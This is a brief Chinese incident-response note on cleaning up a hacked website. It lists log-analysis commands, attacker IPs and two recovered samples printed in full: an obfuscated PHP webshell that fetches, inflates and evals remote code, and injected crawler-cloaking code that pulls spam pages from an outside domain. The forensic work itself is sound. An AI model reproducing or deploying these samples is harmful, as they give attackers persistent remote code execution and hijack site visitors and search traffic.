2020_0910 清理挂马代码

1、通过Web日志查询近期被被上传的文件,从文件中找到被上传的webshell
2、根据文件通过Web日志查询有什么IP 访问过或则上传过这个文件
3、分析Web日志,查询ip的操作,分析出挂马文件


运用到的命令

cd /www/wwwlogs
cat access.log |grep POST  |grep 200  | awk '{print $7}'|sort|uniq -c|sort -nrk 1 -t' 
grep /Home/Conf/index.php access.log 
grep 163.204.191.32  access.log
grep 117.28.243.157  access.log
grep 163.204.188.158  access.log
grep -r "'fuckyou'"  /www/wwwroot

Webshell跨站脚本

<?php
$password = 'ang';
$b = "chr";
session_start();
if (empty($_SESSION['fuckyou'])) {
    $d = $b(104) . $b(116) . $b(116) . $b(112) . $b(58) . $b(47) . $b(47) . $b(49) . $b(52) . $b(57) . $b(46) . $b(50) . $b(56) . $b(46) . $b(49) . $b(56) . $b(46) . $b(49) . $b(56) . $b(54) . $b(47) . $b(122) . $b(122) . $b(46) . $b(103) . $b(105) . $b(102);
    $e = $b(102) . $b(105) . $b(108) . $b(101) . $b(95);
    $e .= $b(103) . $b(101) . $b(116) . $b(95) . $b(99);
    $e .= $b(111) . $b(110) . $b(116) . $b(101) . $b(110);
    $e .= $b(116) . $b(115);
    $_SESSION['fuckyou'] = $e($d);
}
$f = $b(103) . $b(122) . $b(105) . $b(110);
$f .= $b(102) . $b(108) . $b(97) . $b(116) . $b(101);
@eval($f($_SESSION['fuckyou']));

被挂马文件

被挂马的文件:/Framework/Common/common.php
header("Content-Type: text/html;charset=utf-8");set_time_limit(0);error_reporting(0);$a='stristr';$b=$_SERVER;define('url',$b['REQUEST_URI']);define('ref',$b['HTTP_REFERER']);define('ent',$b['HTTP_USER_AGENT']);define('site',"http://wanqingguang.cn/");define('road',"?road=".$b['HTTP_HOST'].url."&der=".ent);define('regs','@Baidu|Sogou|Yisou|Soso|Haosou|360Spider|So.com|Sm.cn@i');define('area',$a(url,".xml")or $a(url,".doc")or $a(url,".txt")or $a(url,".ppt")or $a(url,".xls")or $a(url,".csv")or $a(url,".shtml")or $a(url,".docx")or $a(url,".xlsx")and $a(url,"?"));if(area&&preg_match(regs,ref)){echo gga(site.'?tz');exit;}if(preg_match(regs,ent)){if(area){echo gga(site.road);exit;}else{echo gga(site."?zz".road);ob_flush();flush();}}function gga($d){$e=array('http'=>array('method'=>"GET"));$i=stream_context_create($e);$j=file_get_contents($d,false,$i);if(!empty($j)){return $j;}}